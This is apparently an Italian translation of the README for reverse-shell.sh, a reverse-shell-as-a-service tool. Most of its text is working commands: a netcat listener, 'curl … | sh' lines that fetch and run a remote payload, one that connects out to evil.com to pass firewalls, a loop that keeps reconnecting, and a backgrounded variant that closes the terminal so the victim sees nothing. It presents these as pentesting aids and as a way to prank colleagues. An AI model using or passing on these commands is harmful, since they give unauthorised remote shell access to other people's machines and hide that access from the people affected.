
Servizio di reverse shell on-demand che rileva automaticamente l'ambiente di destinazione ed esegue il payload appropriato per l'accesso remoto durante i test di penetrazione.
Reverse Shell come servizio - https://reverse-shell.sh
Reverse shell facile da ricordare che dovrebbe funzionare sulla maggior parte dei sistemi Unix-like.
Rileva il software disponibile sul target ed esegue un payload appropriato.
Sulla tua macchina, apri una porta e mettiti in ascolto. Puoi farlo facilmente con netcat.
nc -l 1337
Sulla macchina target, passa l'output di https://reverse-shell.sh/yourip:port a sh.
curl https://reverse-shell.sh/192.168.0.69:1337 | sh
Torna sulla tua macchina: ora dovresti avere un prompt della shell.
È pensato per essere usato per il pentesting o per aiutare i colleghi a capire perché dovrebbero sempre bloccare i propri computer. Per favore, non usarlo per scopi dannosi.
Puoi usare un hostname invece di un IP.
curl https://reverse-shell.sh/localhost:1337 | sh
Poiché si tratta di una connessione inversa, può attraversare i firewall e connettersi a internet.
Potresti metterti in ascolto su un server su evil.com e ottenere una reverse shell dall'interno di una rete sicura con:
curl https://reverse-shell.sh/evil.com:1337 | sh
Di default, quando la shell termina, perdi la connessione. Potrebbe succedere per errore con un comando non valido. Puoi creare facilmente una shell che tenta di riconnettersi racchiudendola in un ciclo while.
while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done
Fai attenzione se lo fai a un collega: se lascia l'ufficio con questo ancora in esecuzione, lo esponi ad attacchi.
La sessione del terminale deve rimanere aperta per mantenere attiva la connessione della reverse shell. Potrebbe essere piuttosto evidente se stai cercando di fare uno scherzo ai colleghi.
Il comando seguente esegue la reverse shell in un processo in background e chiude il terminale, senza lasciare finestre del terminale dall'aspetto sospetto aperte sulla macchina della vittima.
Assicurati di eseguirlo in una nuova finestra del terminale, altrimenti perderai tutto il lavoro nella sessione corrente.
sh -c "curl https://reverse-shell.sh/localhost:1337 | sh -i &" && exit
MIT © Luke Childs